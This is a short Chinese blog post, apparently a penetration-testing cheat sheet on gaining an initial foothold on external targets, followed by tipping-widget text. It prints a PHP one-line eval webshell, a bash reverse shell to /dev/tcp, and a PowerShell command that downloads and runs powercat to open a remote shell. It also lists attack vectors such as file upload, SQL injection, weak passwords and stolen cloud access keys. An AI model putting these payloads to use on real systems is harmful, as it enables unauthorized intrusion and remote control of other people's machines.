外网打点常见思路

shell的常见类型

一、webshell

常见类型:php、java、asp、aspx

通常分为:大马和小马

常见管理工具:菜刀、哥斯拉、冰蝎、蚁剑

经典一句话:  <?php @eval($_REQUEST[10086]);?>

二、反弹shell

基础反弹shell:

linux:

bash -i >& /dev/tcp/192.168.0.1/65535 0>&1

windows: powershell IEX(New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ip -p port -e cmd

三、升级可交互式反弹shell

WEB应用获取权限常见方式:

一、任意文件上传漏洞

二、web容器解析漏洞

三、文件包含漏洞

四、命令执行漏洞、代码执行漏洞

五、sql注入漏洞

六、未授权访问漏洞

七、框架、组件、CMS漏洞,其他组合拳...等等

数据库服务获取权限方式

获取权限方式:组合拳或者执行数据库内部函数

数据库类型:mssql、mysql、oracle、redis、postgresql、SQLite等等

常见协议获取权限方式

获取权限方式:CVE漏洞、弱口令、未授权访问等

常用服务:RDP、 SSH、 VNC、telnet、ftp、RMI、SMB、JDWP、  rsync等等

其他获取权限方式

钓鱼、 云服务器key:阿里accesskey、 运维远控工具漏洞等

详细内容点击直播回放

http://rslg.venuskylin.com.cn/zskjz

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

rs麟阁

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值